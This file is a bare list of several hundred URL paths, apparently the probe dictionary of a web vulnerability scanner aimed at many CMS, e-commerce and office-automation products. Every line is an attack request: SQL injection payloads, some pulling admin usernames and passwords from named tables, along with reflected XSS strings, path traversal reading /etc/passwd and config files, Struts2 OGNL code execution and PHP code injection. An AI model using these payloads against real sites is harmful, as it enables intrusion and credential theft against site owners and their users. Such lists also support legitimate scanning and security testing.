/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%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,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
